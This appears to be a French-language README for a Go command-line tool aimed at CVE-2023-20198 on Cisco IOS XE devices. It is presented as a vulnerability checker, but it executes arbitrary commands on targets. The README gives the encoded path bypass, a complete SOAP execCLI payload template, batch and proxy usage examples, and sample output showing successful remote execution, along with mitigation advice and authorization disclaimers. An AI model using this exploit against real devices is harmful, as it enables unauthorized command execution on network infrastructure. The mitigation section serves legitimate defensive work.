
Scanneur de vulnérabilités basé sur Go pour la détection de CVE-2023-20198 sur les appareils Cisco IOS XE. Teste les interfaces SOAP/XML (WSMA) pour l'exécution de code à distance avec analyse par lots et génération de rapports HTML.
Un scanner de vulnérabilités professionnel pour détecter CVE-2023-20198 sur les appareils Cisco IOS XE. Teste les interfaces SOAP/XML vulnérables (WSMA). Conçu pour les évaluations de sécurité autorisées et l'audit réseau.
POUR TESTS DE SÉCURITÉ AUTORISÉS UNIQUEMENT
Cet outil est destiné exclusivement à :
L'accès non autorisé aux systèmes informatiques est ILLÉGAL. Assurez-vous toujours d'avoir l'autorisation appropriée avant de tester tout système.
go install (Recommandé)go install github.com/gustavorobertux/cisco-cve-2023-20198-checker@latest
Le binaire sera installé dans votre répertoire $GOPATH/bin (généralement ~/go/bin).
# Cloner le dépôt
git clone https://github.com/gustavorobertux/cisco-cve-2023-20198-checker.git
cd cisco-cve-2023-20198-checker
# Compiler
go build -o cisco-cve-2023-20198-checker
# Installer (optionnel)
sudo mv cisco-cve-2023-20198-checker /usr/local/bin/
# Vérifier une seule cible
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# Vérifier plusieurs cibles
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin
# Générer un rapport HTML
cisco-cve-2023-20198-checker -target 10.0.0.1 -password secret -html
Parfait pour les environnements d'entreprise ! Prend en charge :
# Proxy HTTP
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# SOCKS5 (tunnel SSH)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# Variable d'environnement
export HTTPS_PROXY=http://proxy.company.com:8080
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin
Voir PROXY_GUIDE.md pour une configuration détaillée des proxys.
| Option | Type | Défaut | Description |
|---|---|---|---|
-target | string | - | IP/nom d'hôte de la cible unique |
-targets-file | string | - | Fichier contenant les cibles (une par ligne) |
-port | int | 443 | Port HTTPS/SOAP |
-username | string | admin | Nom d'utilisateur SOAP |
-password | string | - | Requis. Mot de passe SOAP |
-command | string | uname -a | Commande à exécuter |
-html | bool | false | Générer un rapport HTML |
-timeout | int | 10 | Délai d'attente de la requête (secondes) |
-skip-verify | bool | true | Ignorer la vérification SSL |
-proxy | string | - | URL du proxy (http://, https://, socks5://) |
# Vérification de vulnérabilité de base
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin123
# Port personnalisé
cisco-cve-2023-20198-checker -target 10.0.0.1 -port 8443 -password secret
# Exécuter une commande spécifique
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# Générer un rapport
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin -html
# Créer un fichier de cibles
cat > targets.txt << EOF
192.168.1.100
10.0.0.1
172.16.0.50
EOF
# Tester toutes les cibles
cisco-cve-2023-20198-checker -targets-file targets.txt -password admin123
# Lot avec rapport HTML
cisco-cve-2023-20198-checker -targets-file devices.txt -password admin -html
# Énumération réseau
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show ip interface brief"
# Détection de version
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-command "show version"
# Via proxy HTTP
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://proxy.company.com:8080
# Via proxy SOCKS5 (tunnel SSH)
cisco-cve-2023-20198-checker -target 192.168.1.100 -password admin \
-proxy socks5://127.0.0.1:1080
# Proxy authentifié
cisco-cve-2023-20198-checker -target 10.0.0.1 -password admin \
-proxy http://user:[email protected]:8080
Identifiant CVE : CVE-2023-20198
Score CVSS : 10.0 (Critique)
Type : Exécution de code à distance (RCE)
Affecté : Interface Web Cisco IOS XE (WSMA)
/%2577ebui_wsma_https (contournement d'encodage de chemin)urn:cisco:wsma-exec<SOAP:Envelope xmlns:SOAP="http://schemas.xmlsoap.org/soap/envelope/">
<SOAP:Header>
<wsse:Security xmlns:wsse="http://schemas.xmlsoap.org/ws/2002/04/secext">
<wsse:UsernameToken>
<wsse:Username>admin</wsse:Username>
<wsse:Password>password</wsse:Password>
</wsse:UsernameToken>
</wsse:Security>
</SOAP:Header>
<SOAP:Body>
<request xmlns="urn:cisco:wsma-exec">
<execCLI>
<cmd>COMMAND_HERE</cmd>
</execCLI>
</request>
</SOAP:Body>
</SOAP:Envelope>
Si vos appareils sont vulnérables :
1. Désactiver WSMA (si non requis)
no ip http server
no ip http secure-server
2. Restreindre l'accès avec des ACL
ip http access-class MGMT-ONLY
ip access-list standard MGMT-ONLY
permit 10.0.0.0 0.0.0.255
deny any log
3. Mettre à jour le firmware - Appliquer les derniers correctifs de sécurité Cisco
4. Activer une authentification forte
aaa new-model
aaa authentication login default group tacacs+ local
5. Surveiller les journaux - Rechercher toute activité SOAP/HTTP suspecte
# Compilation standard
go build -o cisco-cve-2023-20198-checker
# Optimisé (binaire plus petit)
go build -ldflags="-s -w" -o cisco-cve-2023-20198-checker
# Compilation croisée pour différentes plateformes
GOOS=linux GOARCH=amd64 go build -o cisco-cve-2023-20198-checker-linux
GOOS=windows GOARCH=amd64 go build -o cisco-cve-2023-20198-checker.exe
GOOS=darwin GOARCH=arm64 go build -o cisco-cve-2023-20198-checker-mac-m1
╔═══════════════════════════════════════════════════════════╗
║ Cisco SOAP/XML Security Checker ║
║ Educational & Authorized Security Assessment Only ║
╚═══════════════════════════════════════════════════════════╝
[*] Command: show version
[*] Port: 443
[*] Timeout: 10 seconds
[1/1] Testing target: 192.168.1.100:443
[*] Sending SOAP request...
[+] Response received (Status: 200)
[+] Success!
╔═══════════════════════════════════════════════════════════╗
║ BATCH RESULTS ║
╚═══════════════════════════════════════════════════════════╝
[✓] 192.168.1.100:443 - SUCCESS
Cisco IOS XE Software, Version 16.09.04...
╔═══════════════════════════════════════════════════════════╗
║ SUMMARY ║
╚═══════════════════════════════════════════════════════════╝
Total Targets: 1
Successful: 1
Failed: 0
Rapport d'évaluation de sécurité professionnel avec :
Les contributions sont les bienvenues ! Veuillez :
Licence MIT - voir le fichier LICENSE
Cet outil est destiné uniquement à l'analyse de vulnérabilités autorisée. Les auteurs ne sont pas responsables d'une mauvaise utilisation. Obtenez toujours une autorisation écrite avant de tester des systèmes dont vous n'êtes pas propriétaire.
Fait pour la communauté de la sécurité 🛡️